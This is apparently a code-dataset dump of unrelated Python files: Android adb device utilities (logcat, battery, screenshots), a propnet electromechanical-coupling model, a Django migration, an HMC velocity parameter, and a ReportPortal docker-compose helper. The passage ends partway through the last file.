re_search = re.compile(r'^\s*' + re.escape(JAVA_ASSERT_PROPERTY) +
r'\s*=\s*all\s*$', re.MULTILINE)
if enable != bool(re.search(re_search, properties)):
re_replace = re.compile(r'^\s*' + re.escape(JAVA_ASSERT_PROPERTY) +
r'\s*=\s*\w+\s*$', re.MULTILINE)
properties = re.sub(re_replace, '', properties)
if enable:
properties += '\n%s=all\n' % JAVA_ASSERT_PROPERTY
file(temp_props_file.name, 'w').write(properties)
self._adb.Push(temp_props_file.name, LOCAL_PROPERTIES_PATH)
# Next, check the current runtime value is what we need, and
# if not, set it and report that a reboot is required.
was_set = 'all' in self.system_properties[JAVA_ASSERT_PROPERTY]
if was_set == enable:
return False
self.system_properties[JAVA_ASSERT_PROPERTY] = enable and 'all' or ''
return True
def GetBuildId(self):
"""Returns the build ID of the system (e.g. JRM79C)."""
build_id = self.system_properties['ro.build.id']
assert build_id
return build_id
def GetBuildType(self):
"""Returns the build type of the system (e.g. eng)."""
build_type = self.system_properties['ro.build.type']
assert build_type
return build_type
def GetBuildProduct(self):
"""Returns the build product of the device (e.g. maguro)."""
build_product = self.system_properties['ro.build.product']
assert build_product
return build_product
def GetProductName(self):
"""Returns the product name of the device (e.g. takju)."""
name = self.system_properties['ro.product.name']
assert name
return name
def GetBuildFingerprint(self):
"""Returns the build fingerprint of the device."""
build_fingerprint = self.system_properties['ro.build.fingerprint']
assert build_fingerprint
return build_fingerprint
def GetDescription(self):
"""Returns the description of the system.
For example, "yakju-userdebug 4.1 JRN54F 364167 dev-keys".
"""
description = self.system_properties['ro.build.description']
assert description
return description
def GetProductModel(self):
"""Returns the name of the product model (e.g. "Galaxy Nexus") """
model = self.system_properties['ro.product.model']
assert model
return model
def GetWifiIP(self):
"""Returns the wifi IP on the device."""
wifi_ip = self.system_properties['dhcp.wlan0.ipaddress']
# Do not assert here. Devices (e.g. emulators) may not have a WifiIP.
return wifi_ip
def GetSubscriberInfo(self):
"""Returns the device subscriber info (e.g. GSM and device ID) as string."""
iphone_sub = self.RunShellCommand('dumpsys iphonesubinfo')
# Do not assert here. Devices (e.g. Nakasi on K) may not have iphonesubinfo.
return '\n'.join(iphone_sub)
def GetBatteryInfo(self):
"""Returns a {str: str} dict of battery info (e.g. status, level, etc)."""
battery = self.RunShellCommand('dumpsys battery')
assert battery
battery_info = {}
for line in battery[1:]:
k, _, v = line.partition(': ')
battery_info[k.strip()] = v.strip()
return battery_info
def GetSetupWizardStatus(self):
"""Returns the status of the device setup wizard (e.g. DISABLED)."""
status = self.system_properties['ro.setupwizard.mode']
# On some devices, the status is empty if not otherwise set. In such cases
# the caller should expect an empty string to be returned.
return status
def StartMonitoringLogcat(self, clear=True, logfile=None, filters=None):
"""Starts monitoring the output of logcat, for use with WaitForLogMatch.
Args:
clear: If True the existing logcat output will be cleared, to avoiding
matching historical output lurking in the log.
filters: A list of logcat filters to be used.
"""
if clear:
self.RunShellCommand('logcat -c')
args = []
if self._adb._target_arg:
args += shlex.split(self._adb._target_arg)
args += ['logcat', '-v', 'threadtime']
if filters:
args.extend(filters)
else:
args.append('*:v')
if logfile:
logfile = NewLineNormalizer(logfile)
# Spawn logcat and synchronize with it.
for _ in range(4):
self._logcat = pexpect.spawn(constants.GetAdbPath(), args, timeout=10,
logfile=logfile)
if not clear or self.SyncLogCat():
break
self._logcat.close(force=True)
else:
logging.critical('Error reading from logcat: ' + str(self._logcat.match))
sys.exit(1)
def SyncLogCat(self):
"""Synchronize with logcat.
Synchronize with the monitored logcat so that WaitForLogMatch will only
consider new message that are received after this point in time.
Returns:
True if the synchronization succeeded.
"""
assert self._logcat
tag = 'logcat_sync_%s' % time.time()
self.RunShellCommand('log ' + tag)
return self._logcat.expect([tag, pexpect.EOF, pexpect.TIMEOUT]) == 0
def GetMonitoredLogCat(self):
"""Returns an "adb logcat" command as created by pexpected.spawn."""
if not self._logcat:
self.StartMonitoringLogcat(clear=False)
return self._logcat
def WaitForLogMatch(self, success_re, error_re, clear=False, timeout=10):
"""Blocks until a matching line is logged or a timeout occurs.
Args:
success_re: A compiled re to search each line for.
error_re: A compiled re which, if found, terminates the search for
|success_re|. If None is given, no error condition will be detected.
clear: If True the existing logcat output will be cleared, defaults to
false.
timeout: Timeout in seconds to wait for a log match.
Raises:
pexpect.TIMEOUT after |timeout| seconds without a match for |success_re|
or |error_re|.
Returns:
The re match object if |success_re| is matched first or None if |error_re|
is matched first.
"""
logging.info('<<< Waiting for logcat:' + str(success_re.pattern))
t0 = time.time()
while True:
if not self._logcat:
self.StartMonitoringLogcat(clear)
try:
while True:
# Note this will block for upto the timeout _per log line_, so we need
# to calculate the overall timeout remaining since t0.
time_remaining = t0 + timeout - time.time()
if time_remaining < 0:
raise pexpect.TIMEOUT(self._logcat)
self._logcat.expect(PEXPECT_LINE_RE, timeout=time_remaining)
line = self._logcat.match.group(1)
if error_re:
error_match = error_re.search(line)
if error_match:
return None
success_match = success_re.search(line)
if success_match:
return success_match
logging.info('<<< Skipped Logcat Line:' + str(line))
except pexpect.TIMEOUT:
raise pexpect.TIMEOUT(
'Timeout (%ds) exceeded waiting for pattern "%s" (tip: use -vv '
'to debug)' %
(timeout, success_re.pattern))
except pexpect.EOF:
# It seems that sometimes logcat can end unexpectedly. This seems
# to happen during Chrome startup after a reboot followed by a cache
# clean. I don't understand why this happens, but this code deals with
logging.critical('Found EOF in adb logcat. Restarting...')
self._logcat = pexpect.spawn(constants.GetAdbPath(),
self._logcat.args[1:],
timeout=self._logcat.timeout,
logfile=self._logcat.logfile)
def StartRecordingLogcat(self, clear=True, filters=None):
"""Starts recording logcat output to eventually be saved as a string.
This call should come before some series of tests are run, with either
StopRecordingLogcat or SearchLogcatRecord following the tests.
Args:
clear: True if existing log output should be cleared.
filters: A list of logcat filters to be used.
"""
if not filters:
filters = ['*:v']
if clear:
self._adb.SendCommand('logcat -c')
logcat_command = 'adb %s logcat -v threadtime %s' % (self._adb._target_arg,
' '.join(filters))
self._logcat_tmpoutfile = tempfile.NamedTemporaryFile(bufsize=0)
self.logcat_process = subprocess.Popen(logcat_command, shell=True,
stdout=self._logcat_tmpoutfile)
def GetCurrentRecordedLogcat(self):
"""Return the current content of the logcat being recorded.
Call this after StartRecordingLogcat() and before StopRecordingLogcat().
This can be useful to perform timed polling/parsing.
Returns:
Current logcat output as a single string, or None if
StopRecordingLogcat() was already called.
"""
if not self._logcat_tmpoutfile:
return None
with open(self._logcat_tmpoutfile.name) as f:
return f.read()
def StopRecordingLogcat(self):
"""Stops an existing logcat recording subprocess and returns output.
Returns:
The logcat output as a string or an empty string if logcat was not
being recorded at the time.
"""
if not self.logcat_process:
return ''
# Cannot evaluate directly as 0 is a possible value.
# Better to read the self.logcat_process.stdout before killing it,
# Otherwise the communicate may return incomplete output due to pipe break.
if self.logcat_process.poll() is None:
self.logcat_process.kill()
self.logcat_process.wait()
self.logcat_process = None
self._logcat_tmpoutfile.seek(0)
output = self._logcat_tmpoutfile.read()
self._logcat_tmpoutfile.close()
self._logcat_tmpoutfile = None
return output
@staticmethod
def SearchLogcatRecord(record, message, thread_id=None, proc_id=None,
log_level=None, component=None):
"""Searches the specified logcat output and returns results.
This method searches through the logcat output specified by record for a
certain message, narrowing results by matching them against any other
specified criteria. It returns all matching lines as described below.
Args:
record: A string generated by Start/StopRecordingLogcat to search.
message: An output string to search for.
thread_id: The thread id that is the origin of the message.
proc_id: The process that is the origin of the message.
log_level: The log level of the message.
component: The name of the component that would create the message.
Returns:
A list of dictionaries represeting matching entries, each containing keys
thread_id, proc_id, log_level, component, and message.
"""
if thread_id:
thread_id = str(thread_id)
if proc_id:
proc_id = str(proc_id)
results = []
reg = re.compile('(\d+)\s+(\d+)\s+([A-Z])\s+([A-Za-z]+)\s*:(.*)$',
re.MULTILINE)
log_list = reg.findall(record)
for (tid, pid, log_lev, comp, msg) in log_list:
if ((not thread_id or thread_id == tid) and
(not proc_id or proc_id == pid) and
(not log_level or log_level == log_lev) and
(not component or component == comp) and msg.find(message) > -1):
match = dict({'thread_id': tid, 'proc_id': pid,
'log_level': log_lev, 'component': comp,
'message': msg})
results.append(match)
return results
def ExtractPid(self, process_name):
"""Extracts Process Ids for a given process name from Android Shell.
Args:
process_name: name of the process on the device.
Returns:
List of all the process ids (as strings) that match the given name.
If the name of a process exactly matches the given name, the pid of
that process will be inserted to the front of the pid list.
"""
pids = []
for line in self.RunShellCommand('ps', log_result=False):
data = line.split()
try:
if process_name in data[-1]: # name is in the last column
if process_name == data[-1]:
pids.insert(0, data[1]) # PID is in the second column
else:
pids.append(data[1])
except IndexError:
pass
return pids
def GetIoStats(self):
"""Gets cumulative disk IO stats since boot (for all processes).
Returns:
Dict of {num_reads, num_writes, read_ms, write_ms} or None if there
was an error.
"""
IoStats = collections.namedtuple(
'IoStats',
['device',
'num_reads_issued',
'num_reads_merged',
'num_sectors_read',
'ms_spent_reading',
'num_writes_completed',
'num_writes_merged',
'num_sectors_written',
'ms_spent_writing',
'num_ios_in_progress',
'ms_spent_doing_io',
'ms_spent_doing_io_weighted',
])
for line in self.GetFileContents('/proc/diskstats', log_result=False):
fields = line.split()
stats = IoStats._make([fields[2]] + [int(f) for f in fields[3:]])
if stats.device == 'mmcblk0':
return {
'num_reads': stats.num_reads_issued,
'num_writes': stats.num_writes_completed,
'read_ms': stats.ms_spent_reading,
'write_ms': stats.ms_spent_writing,
}
logging.warning('Could not find disk IO stats.')
return None
def GetMemoryUsageForPid(self, pid):
"""Returns the memory usage for given pid.
Args:
pid: The pid number of the specific process running on device.
Returns:
Dict of {metric:usage_kb}, for the process which has specified pid.
The metric keys which may be included are: Size, Rss, Pss, Shared_Clean,
Shared_Dirty, Private_Clean, Private_Dirty, VmHWM.
"""
showmap = self.RunShellCommand('showmap %d' % pid)
if not showmap or not showmap[-1].endswith('TOTAL'):
logging.warning('Invalid output for showmap %s', str(showmap))
return {}
items = showmap[-1].split()
if len(items) != 9:
logging.warning('Invalid TOTAL for showmap %s', str(items))
return {}
usage_dict = collections.defaultdict(int)
usage_dict.update({
'Size': int(items[0].strip()),
'Rss': int(items[1].strip()),
'Pss': int(items[2].strip()),
'Shared_Clean': int(items[3].strip()),
'Shared_Dirty': int(items[4].strip()),
'Private_Clean': int(items[5].strip()),
'Private_Dirty': int(items[6].strip()),
})
peak_value_kb = 0
for line in self.GetProtectedFileContents('/proc/%s/status' % pid):
if not line.startswith('VmHWM:'): # Format: 'VmHWM: +[0-9]+ kB'
continue
peak_value_kb = int(line.split(':')[1].strip().split(' ')[0])
break
usage_dict['VmHWM'] = peak_value_kb
if not peak_value_kb:
logging.warning('Could not find memory peak value for pid ' + str(pid))
return usage_dict
def ProcessesUsingDevicePort(self, device_port):
"""Lists processes using the specified device port on loopback interface.
Args:
device_port: Port on device we want to check.
Returns:
A list of (pid, process_name) tuples using the specified port.
"""
tcp_results = self.RunShellCommand('cat /proc/net/tcp', log_result=False)
tcp_address = '0100007F:%04X' % device_port
pids = []
for single_connect in tcp_results:
connect_results = single_connect.split()
# Column 1 is the TCP port, and Column 9 is the inode of the socket
if connect_results[1] == tcp_address:
socket_inode = connect_results[9]
socket_name = 'socket:[%s]' % socket_inode
lsof_results = self.RunShellCommand('lsof', log_result=False)
for single_process in lsof_results:
process_results = single_process.split()
# Ignore the line if it has less than nine columns in it, which may
# be the case when a process stops while lsof is executing.
if len(process_results) <= 8:
continue
# Column 0 is the executable name
# Column 1 is the pid
# Column 8 is the Inode in use
if process_results[8] == socket_name:
pids.append((int(process_results[1]), process_results[0]))
break
logging.info('PidsUsingDevicePort: %s', pids)
return pids
def FileExistsOnDevice(self, file_name):
"""Checks whether the given file exists on the device.
Args:
file_name: Full path of file to check.
Returns:
True if the file exists, False otherwise.
"""
assert '"' not in file_name, 'file_name cannot contain double quotes'
try:
status = self._adb.SendShellCommand(
'\'test -e "%s"; echo $?\'' % (file_name))
if 'test: not found' not in status:
return int(status) == 0
status = self._adb.SendShellCommand(
'\'ls "%s" >/dev/null 2>&1; echo $?\'' % (file_name))
return int(status) == 0
except ValueError:
if IsDeviceAttached(self._device):
raise errors.DeviceUnresponsiveError('Device may be offline.')
return False
def IsFileWritableOnDevice(self, file_name):
"""Checks whether the given file (or directory) is writable on the device.
Args:
file_name: Full path of file/directory to check.
Returns:
True if writable, False otherwise.
"""
assert '"' not in file_name, 'file_name cannot contain double quotes'
try:
status = self._adb.SendShellCommand(
'\'test -w "%s"; echo $?\'' % (file_name))
if 'test: not found' not in status:
return int(status) == 0
raise errors.AbortError('"test" binary not found. OS too old.')
except ValueError:
if IsDeviceAttached(self._device):
raise errors.DeviceUnresponsiveError('Device may be offline.')
return False
@staticmethod
def GetTimestamp():
return time.strftime('%Y-%m-%d-%H%M%S', time.localtime())
@staticmethod
def EnsureHostDirectory(host_file):
host_dir = os.path.dirname(os.path.abspath(host_file))
if not os.path.exists(host_dir):
os.makedirs(host_dir)
def TakeScreenshot(self, host_file=None):
"""Saves a screenshot image to |host_file| on the host.
Args:
host_file: Absolute path to the image file to store on the host or None to
use an autogenerated file name.
Returns:
Resulting host file name of the screenshot.
"""
host_file = os.path.abspath(host_file or
'screenshot-%s.png' % self.GetTimestamp())
self.EnsureHostDirectory(host_file)
device_file = '%s/screenshot.png' % self.GetExternalStorage()
self.RunShellCommand(
'/system/bin/screencap -p %s' % device_file)
self.PullFileFromDevice(device_file, host_file)
self.RunShellCommand('rm -f "%s"' % device_file)
return host_file
def PullFileFromDevice(self, device_file, host_file):
"""Download |device_file| on the device from to |host_file| on the host.
Args:
device_file: Absolute path to the file to retrieve from the device.
host_file: Absolute path to the file to store on the host.
"""
if not self._adb.Pull(device_file, host_file):
raise device_errors.AdbCommandFailedError(
['pull', device_file, host_file], 'Failed to pull file from device.')
assert os.path.exists(host_file)
def SetUtilWrapper(self, util_wrapper):
"""Sets a wrapper prefix to be used when running a locally-built
binary on the device (ex.: md5sum_bin).
"""
self._util_wrapper = util_wrapper
def RunUIAutomatorTest(self, test, test_package, timeout):
"""Runs a single uiautomator test.
Args:
test: Test class/method.
test_package: Name of the test jar.
timeout: Timeout time in seconds.
Returns:
An instance of am_instrument_parser.TestResult object.
"""
cmd = 'uiautomator runtest %s -e class %s' % (test_package, test)
self._LogShell(cmd)
output = self._adb.SendShellCommand(cmd, timeout_time=timeout)
# uiautomator doesn't fully conform to the instrumenation test runner
# Just assume the first result is valid.
(test_results, _) = am_instrument_parser.ParseAmInstrumentOutput(output)
if not test_results:
raise errors.InstrumentationError(
'no test results... device setup correctly?')
return test_results[0]
def DismissCrashDialogIfNeeded(self):
"""Dismiss the error/ANR dialog if present.
Returns: Name of the crashed package if a dialog is focused,
None otherwise.
"""
re_focus = re.compile(
r'\s*mCurrentFocus.*Application (Error|Not Responding): (\S+)}')
def _FindFocusedWindow():
match = None
for line in self.RunShellCommand('dumpsys window windows'):
match = re.match(re_focus, line)
if match:
break
return match
match = _FindFocusedWindow()
if not match:
return
package = match.group(2)
logging.warning('Trying to dismiss %s dialog for %s' % match.groups())
self.SendKeyEvent(KEYCODE_DPAD_RIGHT)
self.SendKeyEvent(KEYCODE_DPAD_RIGHT)
self.SendKeyEvent(KEYCODE_ENTER)
match = _FindFocusedWindow()
if match:
logging.error('Still showing a %s dialog for %s' % match.groups())
return package
def EfficientDeviceDirectoryCopy(self, source, dest):
""" Copy a directory efficiently on the device
Uses a shell script running on the target to copy new and changed files the
source directory to the destination directory and remove added files. This
is in some cases much faster than cp -r.
Args:
source: absolute path of source directory
dest: absolute path of destination directory
"""
logging.info('In EfficientDeviceDirectoryCopy %s %s', source, dest)
with DeviceTempFile(self, suffix=".sh") as temp_script_file:
host_script_path = os.path.join(constants.DIR_SOURCE_ROOT,
'build',
'android',
'pylib',
'efficient_android_directory_copy.sh')
self._adb.Push(host_script_path, temp_script_file.name)
out = self.RunShellCommand(
'sh %s %s %s' % (temp_script_file.name, source, dest),
timeout_time=120)
if self._device:
device_repr = self._device[-4:]
else:
device_repr = '????'
for line in out:
logging.info('[%s]> %s', device_repr, line)
def _GetControlUsbChargingCommand(self):
if self._control_usb_charging_command['cached']:
return self._control_usb_charging_command['command']
self._control_usb_charging_command['cached'] = True
if not self.IsRootEnabled():
return None
for command in CONTROL_USB_CHARGING_COMMANDS:
# Assert command is valid.
assert 'disable_command' in command
assert 'enable_command' in command
assert 'witness_file' in command
witness_file = command['witness_file']
if self.FileExistsOnDevice(witness_file):
self._control_usb_charging_command['command'] = command
return command
return None
def CanControlUsbCharging(self):
return self._GetControlUsbChargingCommand() is not None
def DisableUsbCharging(self, timeout=10):
command = self._GetControlUsbChargingCommand()
if not command:
raise Exception('Unable to act on usb charging.')
disable_command = command['disable_command']
t0 = time.time()
# Do not loop directly on self.IsDeviceCharging to cut the number of calls
# to the device.
while True:
if t0 + timeout - time.time() < 0:
raise pexpect.TIMEOUT('Unable to disable USB charging in time: %s' % (
self.GetBatteryInfo()))
self.RunShellCommand(disable_command)
if not self.IsDeviceCharging():
break
def EnableUsbCharging(self, timeout=10):
command = self._GetControlUsbChargingCommand()
if not command:
raise Exception('Unable to act on usb charging.')
disable_command = command['enable_command']
t0 = time.time()
# Do not loop directly on self.IsDeviceCharging to cut the number of calls
# to the device.
while True:
if t0 + timeout - time.time() < 0:
raise pexpect.TIMEOUT('Unable to enable USB charging in time.')
self.RunShellCommand(disable_command)
if self.IsDeviceCharging():
break
def IsDeviceCharging(self):
for line in self.RunShellCommand('dumpsys battery'):
if 'powered: ' in line:
if line.split('powered: ')[1] == 'true':
return True
class NewLineNormalizer(object):
"""A file-like object to normalize EOLs to '\n'.
Pexpect runs adb within a pseudo-tty device (see
http://www.noah.org/wiki/pexpect), so any '\n' printed by adb is written
as '\r\n' to the logfile. Since adb already uses '\r\n' to terminate
lines, the log ends up having '\r\r\n' at the end of each line. This
filter replaces the above with a single '\n' in the data stream.
"""
def __init__(self, output):
self._output = output
def write(self, data):
data = data.replace('\r\r\n', '\n')
self._output.write(data)
def flush(self):
self._output.flush()
| false
| true
|
f719218d3fe98d1455ee9174e8b9c5286ddf7b15
| 670
|
py
|
Python
|
src/LocalChoiceModel/vel_param.py
|
noashin/local_global_attention_model
|
531e6a4cc1dc364a6a4168de1b9f972727a8aeb1
|
[
"MIT"
] | null | null | null |
src/LocalChoiceModel/vel_param.py
|
noashin/local_global_attention_model
|
531e6a4cc1dc364a6a4168de1b9f972727a8aeb1
|
[
"MIT"
] | null | null | null |
src/LocalChoiceModel/vel_param.py
|
noashin/local_global_attention_model
|
531e6a4cc1dc364a6a4168de1b9f972727a8aeb1
|
[
"MIT"
] | null | null | null |
import sys
import numpy as np
from scipy.stats import multivariate_normal
sys.path.append('./../../')
from src.HMC.hmcparameter import HMCParameter
class VelParam(HMCParameter):
def __init__(self, init_val):
super().__init__(np.array(init_val))
dim = np.array(init_val).shape
self.mu = np.zeros(dim)
self.sigma = 1
def gen_init_value(self):
self.value = multivariate_normal.rvs(self.mu, self.sigma)
def get_energy_grad(self):
return self.value
def get_energy(self):
return np.dot(self.value, self.value) / 2
def get_energy_for_value(self, value):
return np.dot(value, value) / 2
| 24.814815
| 65
| 0.665672
|
import sys
import numpy as np
from scipy.stats import multivariate_normal
sys.path.append('./../../')
from src.HMC.hmcparameter import HMCParameter
class VelParam(HMCParameter):
def __init__(self, init_val):
super().__init__(np.array(init_val))
dim = np.array(init_val).shape
self.mu = np.zeros(dim)
self.sigma = 1
def gen_init_value(self):
self.value = multivariate_normal.rvs(self.mu, self.sigma)
def get_energy_grad(self):
return self.value
def get_energy(self):
return np.dot(self.value, self.value) / 2
def get_energy_for_value(self, value):
return np.dot(value, value) / 2
| true
| true
|
f719245ed4a4fb729ba07d5a218d16d0af49e06d
| 1,972
|
py
|
Python
|
propnet/models/python/electromechanical_coupling.py
|
ruriboshi/propnet
|
770703fb4fc344f785f89c02f26b31ea5733d2bd
|
[
"BSD-3-Clause-LBNL"
] | 57
|
2018-01-09T14:56:20.000Z
|
2022-02-24T11:44:42.000Z
|
propnet/models/python/electromechanical_coupling.py
|
ruriboshi/propnet
|
770703fb4fc344f785f89c02f26b31ea5733d2bd
|
[
"BSD-3-Clause-LBNL"
] | 214
|
2017-09-26T23:31:09.000Z
|
2022-03-14T04:50:58.000Z
|
propnet/models/python/electromechanical_coupling.py
|
ruriboshi/propnet
|
770703fb4fc344f785f89c02f26b31ea5733d2bd
|
[
"BSD-3-Clause-LBNL"
] | 26
|
2017-10-29T21:34:22.000Z
|
2022-01-12T05:59:12.000Z
|
import numpy as np
def plug_in(symbol_values):
req_symbols = ["S", "e", "d"]
data = {}
if all(s in symbol_values for s in req_symbols):
e = symbol_values["e"]
S = symbol_values["S"]
d = symbol_values["d"]
data["k"] = np.abs(d[2][2] / np.sqrt(e[2][2] * S[2][2]))
return data
DESCRIPTION = """
Model calculating the electromechanical coupling factor,
which is the efficiency of converting eletrical energy
to acoustic energy in a piezoeletric transducer or filter
"""
test_data = [{
"inputs": {
"S": [[0.007482236755310126, -0.002827041595205337, -0.002827041595205337, 0.0, 0.0, 0.0],
[-0.002827041595205337, 0.007482236755310125, -0.002827041595205337, 0.0, 0.0, 0.0],
[-0.0028270415952053366, -0.002827041595205337, 0.007482236755310125, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.010309278350515464, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.010309278350515464, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.010309278350515464]],
"e": [[18.65, 0.00, 0.00], [-0.00, 18.65, 0.00], [-0.00, 0.00, 7.88]],
"d": [[-0.0412497, -0.28686697, 0.06342802], [0.05065159, 0.26064878, -0.04828778],
[0.08828203, 0.5660897, -0.11520665], [-0.16218673, -0.92468949, 0.2109461],
[0.02485558, 0.03232004, -0.02421919], [0.06636329, 0.46541895, -0.09526407]]
},
"outputs": {
"k": 0.47445902984
}
}]
config = {
"name": "electromechanical_coupling",
"connections": [{
"inputs": ["e", "S", "d"],
"outputs": ["k"]
}],
"categories": ["mechanical", "electrical"],
"variable_symbol_map": {
"S": "compliance_tensor_voigt",
"e": "dielectric_tensor",
"d": "piezoelectric_tensor_converse",
"k": "electromechanical_coupling"
},
"description": DESCRIPTION,
"implemented_by": ["shyamd"],
"references": [],
"plug_in": plug_in,
"test_data": test_data
}
| 32.866667
| 111
| 0.573022
|
import numpy as np
def plug_in(symbol_values):
req_symbols = ["S", "e", "d"]
data = {}
if all(s in symbol_values for s in req_symbols):
e = symbol_values["e"]
S = symbol_values["S"]
d = symbol_values["d"]
data["k"] = np.abs(d[2][2] / np.sqrt(e[2][2] * S[2][2]))
return data
DESCRIPTION = """
Model calculating the electromechanical coupling factor,
which is the efficiency of converting eletrical energy
to acoustic energy in a piezoeletric transducer or filter
"""
test_data = [{
"inputs": {
"S": [[0.007482236755310126, -0.002827041595205337, -0.002827041595205337, 0.0, 0.0, 0.0],
[-0.002827041595205337, 0.007482236755310125, -0.002827041595205337, 0.0, 0.0, 0.0],
[-0.0028270415952053366, -0.002827041595205337, 0.007482236755310125, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.010309278350515464, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.010309278350515464, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.010309278350515464]],
"e": [[18.65, 0.00, 0.00], [-0.00, 18.65, 0.00], [-0.00, 0.00, 7.88]],
"d": [[-0.0412497, -0.28686697, 0.06342802], [0.05065159, 0.26064878, -0.04828778],
[0.08828203, 0.5660897, -0.11520665], [-0.16218673, -0.92468949, 0.2109461],
[0.02485558, 0.03232004, -0.02421919], [0.06636329, 0.46541895, -0.09526407]]
},
"outputs": {
"k": 0.47445902984
}
}]
config = {
"name": "electromechanical_coupling",
"connections": [{
"inputs": ["e", "S", "d"],
"outputs": ["k"]
}],
"categories": ["mechanical", "electrical"],
"variable_symbol_map": {
"S": "compliance_tensor_voigt",
"e": "dielectric_tensor",
"d": "piezoelectric_tensor_converse",
"k": "electromechanical_coupling"
},
"description": DESCRIPTION,
"implemented_by": ["shyamd"],
"references": [],
"plug_in": plug_in,
"test_data": test_data
}
| true
| true
|
f7192509abdc2fa2929bd17b5a5b981950b115dd
| 875
|
py
|
Python
|
forum/migrations/0008_auto_20180116_0137.py
|
SH-anonta/Discussion-Forum
|
03c92916d4dd708ad76e0aa945aaecacb1eac30e
|
[
"MIT"
] | null | null | null |
forum/migrations/0008_auto_20180116_0137.py
|
SH-anonta/Discussion-Forum
|
03c92916d4dd708ad76e0aa945aaecacb1eac30e
|
[
"MIT"
] | null | null | null |
forum/migrations/0008_auto_20180116_0137.py
|
SH-anonta/Discussion-Forum
|
03c92916d4dd708ad76e0aa945aaecacb1eac30e
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.1 on 2018-01-15 19:37
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('forum', '0007_auto_20180113_1812'),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.DeleteModel(
name='User',
),
migrations.AddField(
model_name='userprofile',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| 28.225806
| 114
| 0.618286
|
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('forum', '0007_auto_20180113_1812'),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.DeleteModel(
name='User',
),
migrations.AddField(
model_name='userprofile',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| true
| true
|
f719250ed98ee5f352d386094fce8e0557ce50cb
| 4,716
|
py
|
Python
|
pylenium/scripts/report_portal.py
|
xtrakTD/pyleniumio
|
3c4b3d86491dd3ccf0bc399a42e5336a3c9f7fa6
|
[
"MIT"
] | 169
|
2020-03-16T15:04:42.000Z
|
2022-03-31T18:53:41.000Z
|
pylenium/scripts/report_portal.py
|
xtrakTD/pyleniumio
|
3c4b3d86491dd3ccf0bc399a42e5336a3c9f7fa6
|
[
"MIT"
] | 163
|
2020-03-15T06:33:54.000Z
|
2022-03-31T21:37:09.000Z
|
pylenium/scripts/report_portal.py
|
xtrakTD/pyleniumio
|
3c4b3d86491dd3ccf0bc399a42e5336a3c9f7fa6
|
[
"MIT"
] | 26
|
2020-03-28T05:43:22.000Z
|
2022-02-11T16:46:34.000Z
|
""" ReportPortal.io integration
1. Download the ReportPortal `docker-compose.yml` file as "docker-compose.report-portal.yml"
2. Setup permissions for ElasticSearch
3. Configure the `YAML` file based on OS
4. `docker-compose up`
5. Open ReportPortal and login (change password afterwards)
"""
import platform
from pylenium.scripts import cli_utils
def __stop_containers():
""" Stop all ReportPortal containers.
Returns:
`CompletedProcess`
"""
command = 'docker stop $(docker ps -a -f "name=reportportal" --format "{{.Names}}")'
if platform.system() == 'Windows':
command = "FOR /f \"tokens=*\" %i IN " \
"('docker ps -a -f \"name=reportportal\" --format \"{{.Names}}\"') " \
"DO docker stop %i"
stop_containers_response = cli_utils.run_process(command, shell=True)
if stop_containers_response.returncode != 0:
raise EnvironmentError(f'[FAILED] {command}'
'\n\nUnable to stop ReportPortal containers:'
'\n * Make sure Docker is installed and running'
'\n * Make sure this command is run in the same dir as docker-compose.report-portal.yml'
f'\nResponse: {stop_containers_response}')
return stop_containers_response
def __remove_containers():
""" Remove all ReportPortal containers that are stopped.
Returns:
`CompletedProcess`
"""
command = 'docker rm $(docker ps -a -f "name=reportportal" --format "{{.Names}}")'
if platform.system() == 'Windows':
command = "FOR /f \"tokens=*\" %i IN " \
"('docker ps -a -f \"name=reportportal\" --format \"{{.Names}}\"') " \
"DO docker rm %i"
remove_containers_response = cli_utils.run_process(command, shell=True)
if remove_containers_response.returncode != 0:
raise EnvironmentError(f'[FAILED] {command}'
'\n\nUnable to remove ReportPortal containers after stopping them.'
f'\nResponse: {remove_containers_response}')
return remove_containers_response
def download_compose_yaml_file():
""" Download the ReportPortal docker-compose.yml file.
* It is recommended to run this from the Project Root because
this places the file as "docker-compose.report-portal.yml" in the context where this command was run.
Returns:
`CompletedProcess` if successful.
Raises:
`ConnectionError` if process returns non-zero status code.
"""
response = cli_utils.run_process([
'curl', 'https://raw.githubusercontent.com/reportportal/reportportal/master/docker-compose.yml',
'-o', './docker-compose.report-portal.yml'
])
if response.returncode != 0:
raise ConnectionError(f'\n\nUnable to download docker-compose file from ReportPortal repo. '
f'\nResponse: {response}')
return response
def compose_up():
""" Spin up a ReportPortal instance using docker-compose.report-portal.yml.
Returns:
`CompletedProcess`
Raises:
`EnvironmentError` if process returns non-zero status code.
"""
response = cli_utils.run_process([
'docker-compose', '-p', 'reportportal', # prefix containers with 'reportportal'
'-f', 'docker-compose.report-portal.yml', # use our auto-generated compose.yml
'up', '-d', '--force-recreate' # spin up in detached, "daemon mode"
])
if response.returncode != 0:
raise EnvironmentError('\n\nUnable to run "docker-compose" command to create ReportPortal instance.'
'\n * Make sure Docker is installed and running'
'\n * Make sure this command is run in the same dir as docker-compose.report-portal.yml'
f'\nResponse: {response}')
return response
def down():
""" Tear down the ReportPortal instance.
This does not use the docker-compose.report-portal.yml file because, depending on Docker version, you may
or may not have a network created that is not handled by docker-compose down.
1. Stop all reportportal containers
2. Kill (remove) all reportportal containers
3. Remove the reportportal_default network (depends on docker version)
Returns:
